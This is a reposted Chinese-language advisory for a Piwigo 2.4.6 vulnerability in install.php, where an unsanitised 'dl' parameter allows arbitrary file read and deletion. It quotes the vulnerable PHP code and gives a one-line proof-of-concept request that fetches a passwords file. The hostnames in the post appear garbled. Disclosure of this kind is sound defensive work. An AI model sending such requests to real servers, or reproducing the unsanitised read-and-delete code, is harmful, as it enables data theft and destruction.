好得很程序员自学网

<tfoot draggable='sEl'></tfoot>

Piwigo 2.4.6 (install.php)远程任意文件读取和删除 -

Piwigo 2.4.6 (install.php) Remote Arbitrary File Read/Delete Vulnerability

作者: Piwigo project

程序主页: http://HdhCmsTestpiwigo.org

测试平台: Microsoft Windows 7 Ultimate SP1 (EN)

           Apache 2.4.2 (Win32)

           MySQL 5.5.25a

 

摘要: Piwigo is a photo gallery software for the web that comes

with powerful features to publish and manage your collection of

pictures.

 

描述: Input passed to the 'dl' parameter in 'install.php' script

is not properly sanitised before being used to get the contents of

a resource or delete files. This can be exploited to read and delete

arbitrary data from local resources with the permissions of the web

server via directory traversal attack.

 

====================================================================

/install.php:

-------------

 

113: if (!empty($_GET['dl']) && file_exists(PHPWG_ROOT_PATH.$conf['data_location'].'pwg_'.$_GET['dl']))

114: {

115:   $filename = PHPWG_ROOT_PATH.$conf['data_location'].'pwg_'.$_GET['dl'];

116:   header('Cache-Control: no-cache, must-revalidate');

117:   header('Pragma: no-cache');

118:   header('Content-Disposition: attachment; filename="database.inc.php"');

119:   header('Content-Transfer-Encoding: binary');

120:   header('Content-Length: '.filesize($filename));

121:   echo file_get_contents($filename);

122:   unlink($filename);

123:   exit();

124: }

 

 

http://HdhCmsTest2cto测试数据 /piwigo/install.php?dl=lio_passwords.txt

 

查看更多关于Piwigo 2.4.6 (install.php)远程任意文件读取和删除 -的详细内容...

  阅读:52次